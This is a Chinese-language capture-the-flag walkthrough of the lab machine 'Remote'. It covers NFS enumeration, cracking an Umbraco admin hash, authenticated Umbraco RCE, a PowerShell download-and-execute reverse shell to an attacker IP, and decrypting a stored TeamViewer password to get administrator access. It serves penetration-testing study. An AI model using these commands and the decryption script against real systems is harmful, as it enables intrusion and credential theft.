[Meachines] [Easy] Remote NFS备份文件泄露+Umbraco-RCE+Te…

2024-09-01 130 0

信息收集

IP Address Opening Ports
10.10.10.180 TCP:21, 80, 111, 135, 139, 445, 2049, 5985, 47001, 49664, 49665, 49666, 49667, 49678, 49679, 49680

nmap -p- 10.10.10.180 --min-rate 1000 -sC -sV

PORT      STATE    SERVICE       VERSION
21/tcp    open     ftp           Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp    open     http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Home - Acme Widgets
111/tcp   open     rpcbind       2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/tcp6  rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  2,3,4        111/udp6  rpcbind
|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100005  1,2,3       2049/tcp   mountd
|   100005  1,2,3       2049/tcp6  mountd
|   100005  1,2,3       2049/udp   mountd
|   100005  1,2,3       2049/udp6  mountd
|   100021  1,2,3,4     2049/tcp   nlockmgr
|   100021  1,2,3,4     2049/tcp6  nlockmgr
|   100021  1,2,3,4     2049/udp   nlockmgr
|   100021  1,2,3,4     2049/udp6  nlockmgr
|   100024  1           2049/tcp   status
|   100024  1           2049/tcp6  status
|   100024  1           2049/udp   status
|_  100024  1           2049/udp6  status
135/tcp   open     msrpc         Microsoft Windows RPC
139/tcp   open     netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open     microsoft-ds?
2049/tcp  open     nlockmgr      1-4 (RPC #100021)
5985/tcp  open     http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
22975/tcp filtered unknown
47001/tcp open     http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open     msrpc         Microsoft Windows RPC
49665/tcp open     msrpc         Microsoft Windows RPC
49666/tcp open     msrpc         Microsoft Windows RPC
49667/tcp open     msrpc         Microsoft Windows RPC
49678/tcp open     msrpc         Microsoft Windows RPC
49679/tcp open     msrpc         Microsoft Windows RPC
49680/tcp open     msrpc         Microsoft Windows RPC
63748/tcp filtered unknown
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Umbraco && NFS

[Meachines] [Easy] Remote NFS备份文件泄露+Umbraco-RCE+Te…插图

$ whatweb http://10.10.10.180/ -v

[Meachines] [Easy] Remote NFS备份文件泄露+Umbraco-RCE+Te…插图1

$ showmount -e 10.10.10.180

[Meachines] [Easy] Remote NFS备份文件泄露+Umbraco-RCE+Te…插图2

$ sudo mkdir -p /mnt/10.10.10.180

$ sudo mount -t nfs 10.10.10.180:/site_backups /mnt/10.10.10.180

[Meachines] [Easy] Remote NFS备份文件泄露+Umbraco-RCE+Te…插图3

$ strings App_Data/Umbraco.sdf | grep admin

[Meachines] [Easy] Remote NFS备份文件泄露+Umbraco-RCE+Te…插图4

username:[email protected]
hash:b8be16afba8c314ad33d812f22a04991b90e2aaa

$ hashcat -m 100 b8be16afba8c314ad33d812f22a04991b90e2aaa /usr/share/wordlists/rockyou.txt --force

[Meachines] [Easy] Remote NFS备份文件泄露+Umbraco-RCE+Te…插图5

password:baconandcheese

登录

http://10.10.10.180/Umbraco#/login/false?returnPath=%252FUmbraco

[Meachines] [Easy] Remote NFS备份文件泄露+Umbraco-RCE+Te…插图6

[Meachines] [Easy] Remote NFS备份文件泄露+Umbraco-RCE+Te…插图7

[Meachines] [Easy] Remote NFS备份文件泄露+Umbraco-RCE+Te…插图8

https://www.exploit-db.com/exploits/46153

[Meachines] [Easy] Remote NFS备份文件泄露+Umbraco-RCE+Te…插图9

[Meachines] [Easy] Remote NFS备份文件泄露+Umbraco-RCE+Te…插图10

[Meachines] [Easy] Remote NFS备份文件泄露+Umbraco-RCE+Te…插图11

反向shell

https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1

$ echo "Invoke-PowerShellTcp -Reverse -IPAddress 10.10.16.24 -Port 10032">>Invoke-PowerShellTcp.ps1

将powershell脚本上传目标

string cmd = "/c powershell -c iex(new-object net.webclient).downloadstring(\'http://10.10.16.24/Invoke-PowerShellTcp.ps1')";

$ python exp.py

[Meachines] [Easy] Remote NFS备份文件泄露+Umbraco-RCE+Te…插图12

User.txt

c9b78c488c6ae1828b13d050b156d542

权限提升

TeamViewer应用程序

[Meachines] [Easy] Remote NFS备份文件泄露+Umbraco-RCE+Te…插图13

在msf的插件中提及到Version7的注册表路径是HKLM\\SOFTWARE\\WOW6432Node\\TeamViewer\\Version7

[Meachines] [Easy] Remote NFS备份文件泄露+Umbraco-RCE+Te…插图14

PS HKLM:\software\wow6432node\teamviewer\version7> get-itemproperty -path .

[Meachines] [Easy] Remote NFS备份文件泄露+Umbraco-RCE+Te…插图15

PS HKLM:\software\wow6432node\teamviewer\version7> (Get-ItemProperty -Path .).SecurityPasswordAES -join ", " | ForEach-Object { "[" + $_ + "]" }

[Meachines] [Easy] Remote NFS备份文件泄露+Umbraco-RCE+Te…插图16

[Meachines] [Easy] Remote NFS备份文件泄露+Umbraco-RCE+Te…插图17

#!/usr/bin/env python3

from Crypto.Cipher import AES

key = b"\x06\x02\x00\x00\x00\xa4\x00\x00\x52\x53\x41\x31\x00\x04\x00\x00"
iv = b"\x01\x00\x01\x00\x67\x24\x4F\x43\x6E\x67\x62\xF2\x5E\xA8\xD7\x04"
ciphertext = bytes([255, 155, 28, 115, 214, 107, 206, 49, 172, 65, 62, 174, 
                    19, 27, 70, 79, 88, 47, 108, 226, 209, 225, 243, 218, 
                    126, 141, 55, 107, 38, 57, 78, 91])

aes = AES.new(key, AES.MODE_CBC, IV=iv)
password = aes.decrypt(ciphertext).decode("utf-16").rstrip("\x00")

print(f"[+] Found password: {password}")

$ python dec.py

[Meachines] [Easy] Remote NFS备份文件泄露+Umbraco-RCE+Te…插图18

$ crackmapexec smb 10.10.10.180 -u administrator -p '!R3m0te!'

[Meachines] [Easy] Remote NFS备份文件泄露+Umbraco-RCE+Te…插图19

$ evil-winrm -u administrator -p '!R3m0te!' -i 10.10.10.180

[Meachines] [Easy] Remote NFS备份文件泄露+Umbraco-RCE+Te…插图20

Root.txt

858343dff7922d618a28508565307822


4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。

本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!

程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)

相关文章

webpack打包站点,js文件名批量获取思路
加密对抗靶场enctypt——labs通关
【论文速读】| 注意力是实现基于大语言模型的代码漏洞定位的关键
蓝队技术——Sysmon识别检测宏病毒
内网渗透学习|powershell上线cs
LLM attack中的API调用安全问题及靶场实践

发布评论